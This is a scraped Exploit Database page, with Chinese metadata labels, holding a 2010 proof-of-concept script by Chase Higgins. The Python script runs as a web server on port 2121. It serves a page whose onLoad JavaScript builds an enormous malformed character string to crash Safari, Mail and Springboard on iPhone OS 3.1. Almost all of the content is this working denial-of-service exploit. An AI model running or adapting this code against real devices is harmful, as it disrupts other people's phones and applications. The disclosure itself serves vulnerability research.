iPhone Springboard – Malformed Character Crash (PoC)

• Exploit Database
• 113 阅读

• 作者： Chase Higgins
  日期： 2010-03-15
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/11769/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  #!/usr/bin/python   #iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3 #this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash #all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my #device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it   # Exploit Title: iPhone Springboard Malformed Character Crash PoC # Date: 3/15/2010 # Author: Chase Higgins # Software Link: apple.com/iphone/ # Version: iPhone 2G, iPhone 3GS # Tested on: iPhone OS 3.1, and iPhone OS 3.1.3 # CVE : # Code : none   import sys, socket;   def main(): html = """ <html> <head> <script> function triggerCrash(){ evil_div = document.getElementById(&apos;evilDiv&apos;); var evil_string = "\x4e\x5b\x01"; i = 0;   while (i < 1000){ evil_string = evil_string + evil_string; }   evil_div.innerHTML = evil_string; } </script> </head> <body onLoad="triggerCrash()"> <div id="evilDiv"> </div> </body> </html> """;   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind((&apos;&apos;,2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main();